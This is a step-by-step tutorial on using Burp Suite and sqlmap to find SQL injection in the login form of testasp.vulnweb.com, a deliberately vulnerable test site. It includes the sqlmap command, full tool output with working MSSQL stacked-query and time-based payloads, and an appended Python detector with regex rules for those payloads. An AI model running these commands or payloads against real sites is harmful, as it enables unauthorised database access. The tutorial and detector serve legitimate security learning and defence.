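1. Open the target address http://testasp.vulnweb.com/Login.asp in a browser.
2. Configure the Burp proxy (127.0.0.1:8080) to intercept requests.
3. Click the submit button of the login form.
4. At this point Burp intercepts our login POST request.

5. Save this POST request as a text file (I named it search-test.txt) and put it in the sqlmap directory.
6. Run sqlmap with the following command: ./sqlmap.py -r search-test.txt -p tfUPass. Here -r tells sqlmap to load our POST request from search-test.txt, and -p, which most readers will already know, specifies the parameter to test for injection.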

./sqlmap.py -r search-test.txt -p tfUPass

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from 'search-test.txt'
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie
[13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass'
[13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application >
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc
---
[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'
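
For the defending side, the two payloads in the report above are easy to recognise in captured POST bodies. The following is an added detection example, not part of the original post or of sqlmap; the names inspect_post_body and RULES are hypothetical, and the request bodies are constructed from the payloads shown in the report.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Heuristics keyed to the payload shapes in the sqlmap report above.
RULES = [
    # T-SQL time delay, the basis of both reported techniques.
    ("mssql-time-delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    # A quote closing the string literal, then a statement terminator.
    ("stacked-query", re.compile(r"'\s*;")),
    # A quote followed by a comment marker that cuts off the rest of the query.
    ("comment-truncation", re.compile(r"'.*?--", re.S)),
]


def inspect_post_body(body):
    """Return sorted (parameter, rule) pairs for every heuristic that fires."""
    hits = set()
    # parse_qsl URL-decodes names and values, so encoded payloads are matched too.
    for name, value in parse_qsl(body, keep_blank_values=True):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.add((name, rule))
    return sorted(hits)


# Constructed sample bodies: the two payloads are copied from the report,
# the benign one is made up to show punctuation alone does not trigger a rule.
STACKED = urlencode({"tfUName": "test",
                     "tfUPass": "test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC"})
TIME_BLIND = urlencode({"tfUName": "test",
                        "tfUPass": "test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc"})
BENIGN = urlencode({"tfUName": "alice", "tfUPass": "O'Brien;2024-x"})

if __name__ == "__main__":
    for label, body in [("stacked", STACKED), ("time-blind", TIME_BLIND),
                        ("benign", BENIGN)]:
        print(label, inspect_post_body(body))
```

Pattern matching like this is a monitoring aid only; the fix for the finding itself is to build the login query with bound parameters instead of string concatenation.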
